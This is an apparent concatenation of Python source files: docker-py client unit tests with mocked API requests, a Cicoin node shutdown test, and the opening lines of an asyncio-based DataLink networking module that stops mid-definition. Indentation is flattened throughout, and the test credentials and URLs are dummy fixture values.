def test_url_compatibility_http_unix_triple_slash(self):
c = docker.Client(base_url="http+unix:///socket")
assert self._socket_path_for_client_session(c) == '/socket'
def test_url_compatibility_http(self):
c = docker.Client(base_url="http://hostname:1234")
assert c.base_url == "http://hostname:1234"
def test_url_compatibility_tcp(self):
c = docker.Client(base_url="tcp://hostname:1234")
assert c.base_url == "http://hostname:1234"
def test_logs(self):
try:
logs = self.client.logs(fake_api.FAKE_CONTAINER_ID)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/logs',
params={'timestamps': 0, 'follow': 0, 'stderr': 1, 'stdout': 1,
'tail': 'all'},
timeout=DEFAULT_TIMEOUT_SECONDS,
stream=False
)
self.assertEqual(
logs,
'Flowering Nights\n(Sakuya Iyazoi)\n'.encode('ascii')
)
def test_logs_with_dict_instead_of_id(self):
try:
logs = self.client.logs({'Id': fake_api.FAKE_CONTAINER_ID})
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/logs',
params={'timestamps': 0, 'follow': 0, 'stderr': 1, 'stdout': 1,
'tail': 'all'},
timeout=DEFAULT_TIMEOUT_SECONDS,
stream=False
)
self.assertEqual(
logs,
'Flowering Nights\n(Sakuya Iyazoi)\n'.encode('ascii')
)
def test_log_streaming(self):
try:
self.client.logs(fake_api.FAKE_CONTAINER_ID, stream=True)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/logs',
params={'timestamps': 0, 'follow': 1, 'stderr': 1, 'stdout': 1,
'tail': 'all'},
timeout=DEFAULT_TIMEOUT_SECONDS,
stream=True
)
def test_log_tail(self):
try:
self.client.logs(fake_api.FAKE_CONTAINER_ID, stream=False, tail=10)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/logs',
params={'timestamps': 0, 'follow': 0, 'stderr': 1, 'stdout': 1,
'tail': 10},
timeout=DEFAULT_TIMEOUT_SECONDS,
stream=False
)
def test_diff(self):
try:
self.client.diff(fake_api.FAKE_CONTAINER_ID)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/changes',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_diff_with_dict_instead_of_id(self):
try:
self.client.diff({'Id': fake_api.FAKE_CONTAINER_ID})
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/changes',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_port(self):
try:
self.client.port({'Id': fake_api.FAKE_CONTAINER_ID}, 1111)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/json',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_stop_container(self):
timeout = 2
try:
self.client.stop(fake_api.FAKE_CONTAINER_ID, timeout=timeout)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/stop',
params={'t': timeout},
timeout=(DEFAULT_TIMEOUT_SECONDS + timeout)
)
def test_stop_container_with_dict_instead_of_id(self):
timeout = 2
try:
self.client.stop({'Id': fake_api.FAKE_CONTAINER_ID},
timeout=timeout)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/stop',
params={'t': timeout},
timeout=(DEFAULT_TIMEOUT_SECONDS + timeout)
)
def test_exec_create(self):
try:
self.client.exec_create(fake_api.FAKE_CONTAINER_ID, ['ls', '-1'])
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(
args[0][0], url_prefix + 'containers/{0}/exec'.format(
fake_api.FAKE_CONTAINER_ID
)
)
self.assertEqual(
json.loads(args[1]['data']), {
'Tty': False,
'AttachStdout': True,
'Container': fake_api.FAKE_CONTAINER_ID,
'Cmd': ['ls', '-1'],
'Privileged': False,
'AttachStdin': False,
'AttachStderr': True,
'User': ''
}
)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_exec_start(self):
try:
self.client.exec_start(fake_api.FAKE_EXEC_ID)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(
args[0][0], url_prefix + 'exec/{0}/start'.format(
fake_api.FAKE_EXEC_ID
)
)
self.assertEqual(
json.loads(args[1]['data']), {
'Tty': False,
'Detach': False,
}
)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_exec_inspect(self):
try:
self.client.exec_inspect(fake_api.FAKE_EXEC_ID)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(
args[0][0], url_prefix + 'exec/{0}/json'.format(
fake_api.FAKE_EXEC_ID
)
)
def test_exec_resize(self):
try:
self.client.exec_resize(fake_api.FAKE_EXEC_ID, height=20, width=60)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'exec/{0}/resize'.format(fake_api.FAKE_EXEC_ID),
params={'h': 20, 'w': 60},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_pause_container(self):
try:
self.client.pause(fake_api.FAKE_CONTAINER_ID)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/pause',
timeout=(DEFAULT_TIMEOUT_SECONDS)
)
def test_unpause_container(self):
try:
self.client.unpause(fake_api.FAKE_CONTAINER_ID)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/unpause',
timeout=(DEFAULT_TIMEOUT_SECONDS)
)
def test_kill_container(self):
try:
self.client.kill(fake_api.FAKE_CONTAINER_ID)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/kill',
params={},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_kill_container_with_dict_instead_of_id(self):
try:
self.client.kill({'Id': fake_api.FAKE_CONTAINER_ID})
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/kill',
params={},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_kill_container_with_signal(self):
try:
self.client.kill(fake_api.FAKE_CONTAINER_ID, signal=signal.SIGTERM)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/kill',
params={'signal': signal.SIGTERM},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_restart_container(self):
try:
self.client.restart(fake_api.FAKE_CONTAINER_ID, timeout=2)
except Exception as e:
            self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/restart',
params={'t': 2},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_restart_container_with_dict_instead_of_id(self):
try:
self.client.restart({'Id': fake_api.FAKE_CONTAINER_ID}, timeout=2)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/restart',
params={'t': 2},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_remove_container(self):
try:
self.client.remove_container(fake_api.FAKE_CONTAINER_ID)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b',
params={'v': False, 'link': False, 'force': False},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_remove_container_with_dict_instead_of_id(self):
try:
self.client.remove_container({'Id': fake_api.FAKE_CONTAINER_ID})
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b',
params={'v': False, 'link': False, 'force': False},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_remove_link(self):
try:
self.client.remove_container(fake_api.FAKE_CONTAINER_ID, link=True)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b',
params={'v': False, 'link': True, 'force': False},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_export(self):
try:
self.client.export(fake_api.FAKE_CONTAINER_ID)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/export',
stream=True,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_export_with_dict_instead_of_id(self):
try:
self.client.export({'Id': fake_api.FAKE_CONTAINER_ID})
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/export',
stream=True,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_inspect_container(self):
try:
self.client.inspect_container(fake_api.FAKE_CONTAINER_ID)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/json',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_inspect_container_empty_id(self):
try:
self.client.inspect_container('')
except docker.errors.NullResource as e:
self.assertEqual(
e.args[0], 'image or container param is undefined'
)
else:
self.fail('Command expected NullResource exception')
def test_container_stats(self):
try:
self.client.stats(fake_api.FAKE_CONTAINER_ID)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/3cc2351ab11b/stats',
timeout=60,
stream=True
)
##################
# IMAGES TESTS #
##################
def test_pull(self):
try:
self.client.pull('joffrey/test001')
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(
args[0][0],
url_prefix + 'images/create'
)
self.assertEqual(
args[1]['params'],
{'tag': None, 'fromImage': 'joffrey/test001'}
)
self.assertFalse(args[1]['stream'])
def test_pull_stream(self):
try:
self.client.pull('joffrey/test001', stream=True)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(
args[0][0],
url_prefix + 'images/create'
)
self.assertEqual(
args[1]['params'],
{'tag': None, 'fromImage': 'joffrey/test001'}
)
self.assertTrue(args[1]['stream'])
def test_commit(self):
try:
self.client.commit(fake_api.FAKE_CONTAINER_ID)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'commit',
data='{}',
headers={'Content-Type': 'application/json'},
params={
'repo': None,
'comment': None,
'tag': None,
'container': '3cc2351ab11b',
'author': None
},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_remove_image(self):
try:
self.client.remove_image(fake_api.FAKE_IMAGE_ID)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'images/e9aa60c60128',
params={'force': False, 'noprune': False},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_image_history(self):
try:
self.client.history(fake_api.FAKE_IMAGE_NAME)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'images/test_image/history',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_import_image(self):
try:
self.client.import_image(
fake_api.FAKE_TARBALL_PATH,
repository=fake_api.FAKE_REPO_NAME,
tag=fake_api.FAKE_TAG_NAME
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'images/create',
params={
'repo': fake_api.FAKE_REPO_NAME,
'tag': fake_api.FAKE_TAG_NAME,
'fromSrc': fake_api.FAKE_TARBALL_PATH
},
data=None,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_import_image_from_bytes(self):
stream = (i for i in range(0, 100))
try:
self.client.import_image(
stream,
repository=fake_api.FAKE_REPO_NAME,
tag=fake_api.FAKE_TAG_NAME
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'images/create',
params={
'repo': fake_api.FAKE_REPO_NAME,
'tag': fake_api.FAKE_TAG_NAME,
'fromSrc': '-',
},
headers={
'Content-Type': 'application/tar',
},
data=stream,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_import_image_from_image(self):
try:
self.client.import_image(
image=fake_api.FAKE_IMAGE_NAME,
repository=fake_api.FAKE_REPO_NAME,
tag=fake_api.FAKE_TAG_NAME
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'images/create',
params={
'repo': fake_api.FAKE_REPO_NAME,
'tag': fake_api.FAKE_TAG_NAME,
'fromImage': fake_api.FAKE_IMAGE_NAME
},
data=None,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_inspect_image(self):
try:
self.client.inspect_image(fake_api.FAKE_IMAGE_NAME)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'images/test_image/json',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_inspect_image_empty_id(self):
try:
self.client.inspect_image('')
except docker.errors.NullResource as e:
self.assertEqual(
e.args[0], 'image or container param is undefined'
)
else:
self.fail('Command expected NullResource exception')
def test_insert_image(self):
try:
self.client.insert(fake_api.FAKE_IMAGE_NAME,
fake_api.FAKE_URL, fake_api.FAKE_PATH)
except docker.errors.DeprecatedMethod as e:
self.assertTrue(
docker.utils.compare_version('1.12', self.client._version) >= 0
)
return
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'images/test_image/insert',
params={
'url': fake_api.FAKE_URL,
'path': fake_api.FAKE_PATH
},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_push_image(self):
try:
with mock.patch('docker.auth.auth.resolve_authconfig',
fake_resolve_authconfig):
self.client.push(fake_api.FAKE_IMAGE_NAME)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'images/test_image/push',
params={
'tag': None
},
data='{}',
headers={'Content-Type': 'application/json'},
stream=False,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_push_image_with_tag(self):
try:
with mock.patch('docker.auth.auth.resolve_authconfig',
fake_resolve_authconfig):
self.client.push(
fake_api.FAKE_IMAGE_NAME, tag=fake_api.FAKE_TAG_NAME
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'images/test_image/push',
params={
'tag': fake_api.FAKE_TAG_NAME,
},
data='{}',
headers={'Content-Type': 'application/json'},
stream=False,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_push_image_stream(self):
try:
with mock.patch('docker.auth.auth.resolve_authconfig',
fake_resolve_authconfig):
self.client.push(fake_api.FAKE_IMAGE_NAME, stream=True)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'images/test_image/push',
params={
'tag': None
},
data='{}',
headers={'Content-Type': 'application/json'},
stream=True,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_tag_image(self):
try:
self.client.tag(fake_api.FAKE_IMAGE_ID, fake_api.FAKE_REPO_NAME)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'images/e9aa60c60128/tag',
params={
'tag': None,
'repo': 'repo',
'force': 0
},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_tag_image_tag(self):
try:
self.client.tag(
fake_api.FAKE_IMAGE_ID,
fake_api.FAKE_REPO_NAME,
tag=fake_api.FAKE_TAG_NAME
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'images/e9aa60c60128/tag',
params={
'tag': 'tag',
'repo': 'repo',
'force': 0
},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_tag_image_force(self):
try:
self.client.tag(
fake_api.FAKE_IMAGE_ID, fake_api.FAKE_REPO_NAME, force=True)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'images/e9aa60c60128/tag',
params={
'tag': None,
'repo': 'repo',
'force': 1
},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_get_image(self):
try:
self.client.get_image(fake_api.FAKE_IMAGE_ID)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'images/e9aa60c60128/get',
stream=True,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_load_image(self):
try:
self.client.load_image('Byte Stream....')
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'images/load',
data='Byte Stream....',
timeout=DEFAULT_TIMEOUT_SECONDS
)
#################
# BUILDER TESTS #
#################
def test_build_container(self):
script = io.BytesIO('\n'.join([
'FROM busybox',
'MAINTAINER docker-py',
'RUN mkdir -p /tmp/test',
'EXPOSE 8080',
'ADD https://dl.dropboxusercontent.com/u/20637798/silence.tar.gz'
' /tmp/silence.tar.gz'
]).encode('ascii'))
try:
self.client.build(fileobj=script)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
def test_build_container_pull(self):
script = io.BytesIO('\n'.join([
'FROM busybox',
'MAINTAINER docker-py',
'RUN mkdir -p /tmp/test',
'EXPOSE 8080',
'ADD https://dl.dropboxusercontent.com/u/20637798/silence.tar.gz'
' /tmp/silence.tar.gz'
]).encode('ascii'))
try:
self.client.build(fileobj=script, pull=True)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
def test_build_container_stream(self):
script = io.BytesIO('\n'.join([
'FROM busybox',
'MAINTAINER docker-py',
'RUN mkdir -p /tmp/test',
'EXPOSE 8080',
'ADD https://dl.dropboxusercontent.com/u/20637798/silence.tar.gz'
' /tmp/silence.tar.gz'
]).encode('ascii'))
try:
self.client.build(fileobj=script, stream=True)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
def test_build_container_custom_context(self):
script = io.BytesIO('\n'.join([
'FROM busybox',
'MAINTAINER docker-py',
'RUN mkdir -p /tmp/test',
'EXPOSE 8080',
'ADD https://dl.dropboxusercontent.com/u/20637798/silence.tar.gz'
' /tmp/silence.tar.gz'
]).encode('ascii'))
context = docker.utils.mkbuildcontext(script)
try:
self.client.build(fileobj=context, custom_context=True)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
def test_build_container_custom_context_gzip(self):
script = io.BytesIO('\n'.join([
'FROM busybox',
'MAINTAINER docker-py',
'RUN mkdir -p /tmp/test',
'EXPOSE 8080',
'ADD https://dl.dropboxusercontent.com/u/20637798/silence.tar.gz'
' /tmp/silence.tar.gz'
]).encode('ascii'))
context = docker.utils.mkbuildcontext(script)
gz_context = gzip.GzipFile(fileobj=context)
try:
self.client.build(
fileobj=gz_context,
custom_context=True,
encoding="gzip"
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
def test_build_remote_with_registry_auth(self):
try:
self.client._auth_configs = {
'https://example.com': {
'user': 'example',
'password': 'example',
'email': 'example@example.com'
}
}
self.client.build(path='https://github.com/docker-library/mongo')
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
def test_build_container_with_named_dockerfile(self):
try:
self.client.build('.', dockerfile='nameddockerfile')
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
def test_build_container_with_container_limits(self):
try:
self.client.build('.', container_limits={
'memory': 1024 * 1024,
'cpusetcpus': 1,
'cpushares': 1000,
'memswap': 1024 * 1024 * 8
})
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
def test_build_container_invalid_container_limits(self):
self.assertRaises(
docker.errors.DockerException,
lambda: self.client.build('.', container_limits={
'foo': 'bar'
})
)
#######################
# PY SPECIFIC TESTS #
#######################
def test_load_config_no_file(self):
folder = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, folder)
cfg = docker.auth.load_config(folder)
self.assertTrue(cfg is not None)
def test_load_config(self):
folder = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, folder)
dockercfg_path = os.path.join(folder, '.dockercfg')
with open(dockercfg_path, 'w') as f:
auth_ = base64.b64encode(b'sakuya:izayoi').decode('ascii')
f.write('auth = {0}\n'.format(auth_))
f.write('email = sakuya@scarlet.net')
cfg = docker.auth.load_config(dockercfg_path)
self.assertTrue(docker.auth.INDEX_URL in cfg)
self.assertNotEqual(cfg[docker.auth.INDEX_URL], None)
cfg = cfg[docker.auth.INDEX_URL]
self.assertEqual(cfg['username'], 'sakuya')
self.assertEqual(cfg['password'], 'izayoi')
self.assertEqual(cfg['email'], 'sakuya@scarlet.net')
self.assertEqual(cfg.get('auth'), None)
def test_load_config_with_random_name(self):
folder = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, folder)
dockercfg_path = os.path.join(folder,
'.{0}.dockercfg'.format(
random.randrange(100000)))
registry = 'https://your.private.registry.io'
auth_ = base64.b64encode(b'sakuya:izayoi').decode('ascii')
config = {
registry: {
'auth': '{0}'.format(auth_),
'email': 'sakuya@scarlet.net'
}
}
with open(dockercfg_path, 'w') as f:
f.write(json.dumps(config))
cfg = docker.auth.load_config(dockercfg_path)
self.assertTrue(registry in cfg)
self.assertNotEqual(cfg[registry], None)
cfg = cfg[registry]
self.assertEqual(cfg['username'], 'sakuya')
self.assertEqual(cfg['password'], 'izayoi')
self.assertEqual(cfg['email'], 'sakuya@scarlet.net')
self.assertEqual(cfg.get('auth'), None)
def test_tar_with_excludes(self):
base = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, base)
for d in ['test/foo', 'bar']:
os.makedirs(os.path.join(base, d))
for f in ['a.txt', 'b.py', 'other.png']:
with open(os.path.join(base, d, f), 'w') as f:
f.write("content")
for exclude, names in (
(['*.py'], ['bar', 'bar/a.txt', 'bar/other.png',
'test', 'test/foo', 'test/foo/a.txt',
'test/foo/other.png']),
(['*.png', 'bar'], ['test', 'test/foo', 'test/foo/a.txt',
'test/foo/b.py']),
(['test/foo', 'a.txt'], ['bar', 'bar/a.txt', 'bar/b.py',
'bar/other.png', 'test']),
):
with docker.utils.tar(base, exclude=exclude) as archive:
tar = tarfile.open(fileobj=archive)
self.assertEqual(sorted(tar.getnames()), names)
def test_tar_with_empty_directory(self):
base = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, base)
for d in ['foo', 'bar']:
os.makedirs(os.path.join(base, d))
with docker.utils.tar(base) as archive:
tar = tarfile.open(fileobj=archive)
self.assertEqual(sorted(tar.getnames()), ['bar', 'foo'])
def test_tar_with_file_symlinks(self):
base = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, base)
with open(os.path.join(base, 'foo'), 'w') as f:
f.write("content")
os.makedirs(os.path.join(base, 'bar'))
os.symlink('../foo', os.path.join(base, 'bar/foo'))
with docker.utils.tar(base) as archive:
tar = tarfile.open(fileobj=archive)
self.assertEqual(sorted(tar.getnames()), ['bar', 'bar/foo', 'foo'])
def test_tar_with_directory_symlinks(self):
base = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, base)
for d in ['foo', 'bar']:
os.makedirs(os.path.join(base, d))
os.symlink('../foo', os.path.join(base, 'bar/foo'))
with docker.utils.tar(base) as archive:
tar = tarfile.open(fileobj=archive)
self.assertEqual(sorted(tar.getnames()), ['bar', 'bar/foo', 'foo'])
#######################
# HOST CONFIG TESTS #
#######################
def test_create_host_config_secopt(self):
security_opt = ['apparmor:test_profile']
result = create_host_config(security_opt=security_opt)
self.assertIn('SecurityOpt', result)
self.assertEqual(result['SecurityOpt'], security_opt)
self.assertRaises(
docker.errors.DockerException, create_host_config,
security_opt='wrong'
)
class StreamTest(Cleanup, base.BaseTestCase):
def setUp(self):
socket_dir = tempfile.mkdtemp()
self.build_context = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, socket_dir)
self.addCleanup(shutil.rmtree, self.build_context)
self.socket_file = os.path.join(socket_dir, 'test_sock.sock')
self.server_socket = self._setup_socket()
self.stop_server = False
server_thread = threading.Thread(target=self.run_server)
server_thread.setDaemon(True)
server_thread.start()
self.response = None
self.request_handler = None
self.addCleanup(server_thread.join)
self.addCleanup(self.stop)
def stop(self):
self.stop_server = True
def _setup_socket(self):
server_sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
server_sock.bind(self.socket_file)
# Non-blocking mode so that we can shut the test down easily
server_sock.setblocking(0)
server_sock.listen(5)
return server_sock
def run_server(self):
try:
while not self.stop_server:
try:
connection, client_address = self.server_socket.accept()
except socket.error:
# Probably no connection to accept yet
time.sleep(0.01)
continue
connection.setblocking(1)
try:
self.request_handler(connection)
finally:
connection.close()
finally:
self.server_socket.close()
def early_response_sending_handler(self, connection):
data = b''
headers = None
connection.sendall(self.response)
while not headers:
data += connection.recv(2048)
parts = data.split(b'\r\n\r\n', 1)
if len(parts) == 2:
headers, data = parts
mo = re.search(r'Content-Length: ([0-9]+)', headers.decode())
assert mo
content_length = int(mo.group(1))
while True:
if len(data) >= content_length:
break
data += connection.recv(2048)
def test_early_stream_response(self):
self.request_handler = self.early_response_sending_handler
lines = []
for i in range(0, 50):
line = str(i).encode()
lines += [('%x' % len(line)).encode(), line]
lines.append(b'0')
lines.append(b'')
self.response = (
b'HTTP/1.1 200 OK\r\n'
b'Transfer-Encoding: chunked\r\n'
b'\r\n'
) + b'\r\n'.join(lines)
with docker.Client(base_url="http+unix://" + self.socket_file) \
as client:
for i in range(5):
try:
stream = client.build(
path=self.build_context,
stream=True
)
break
except requests.ConnectionError as e:
if i == 4:
raise e
self.assertEqual(list(stream), [
str(i).encode() for i in range(50)])
if __name__ == '__main__':
unittest.main()
|
feature_shutdown.py
|
#!/usr/bin/env python3
# Copyright (c) 2018 The Cicoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test cicoind shutdown."""
from test_framework.test_framework import CicoinTestFramework
from test_framework.util import assert_equal, get_rpc_proxy, wait_until
from threading import Thread
def test_long_call(node):
block = node.waitfornewblock()
assert_equal(block['height'], 0)
class ShutdownTest(CicoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coveragedir=self.nodes[0].coverage_dir)
# Force connection establishment by executing a dummy command.
node.getblockcount()
Thread(target=test_long_call, args=(node,)).start()
# Wait until the server is executing the above `waitfornewblock`.
wait_until(lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2)
# Wait 1 second after requesting shutdown but not before the `stop` call
# finishes. This is to ensure event loop waits for current connections
# to close.
self.stop_node(0, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
dataLink.py
|
# MIT License
#
# Copyright (c) 2020 Gcom
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import multiprocessing
import threading
import traceback
import abc
from collections import namedtuple
from manager.basic.letter import receving
from typing import Dict, List, Callable, Any, \
Optional
from asyncio import StreamReader, StreamWriter
from manager.basic.mmanager import ModuleTDaemon
from manager.basic.letter import Letter
M_NAME = "DATALINKER"
address = str
port = int
tag = str
arg = Any
DataLinkNotify = namedtuple("notify", "tag msg")
class DATA_LINK_NOT_EXISTS(Exception):
def __init__(self, host: str, port: int) -> None:
self._host = host
self._port = port
def __str__(self) -> str:
return "DataLink(" + self._host + "," + str(self._port) + ")" + \
"does not exists."
class DATA_LINK_PROTO_NOT_SUPPORT(Exception):
def __init__(self, proto: str) -> None:
self._proto = proto
def __str__(self) -> str:
return "Protocol " + self._proto + " is not support."
class NOTIFIER_IS_ALREADY_EXISTS(Exception):
def __init__(self, tag: str) -> None:
self._tag = tag
def __str__(self) -> str:
return "Notifier " + self._tag + " is already exists."
class Notifier:
def __init__(self, callback: Callable[[Any, Any], None], arg: Any) -> None:
self._cb = callback
self._arg = arg
def notify(self, msg: Any) -> None:
self._cb(msg, self._arg)
class DataLink(abc.ABC):
TCP_DATALINK = "tcp"
UDP_DATALINK = "udp"
PROTO = ""
def __init__(self, host: str, port: int,
processor: Callable[['DataLink', Any, Any], None],
args: Any, notify_q: multiprocessing.Queue) -> None:
"""
        PROTO identifies the link's transport and is set by subclasses to
        TCP_DATALINK or UDP_DATALINK.
"""
self.host = host
self.port = port
self._notifyQ = notify_q
# Processor
self._processor = processor # type: Callable[[DataLink, Any, Any], None]
self._args = args # type: Any
self._p = None # type: Optional[multiprocessing.Process]
def start(self) -> None:
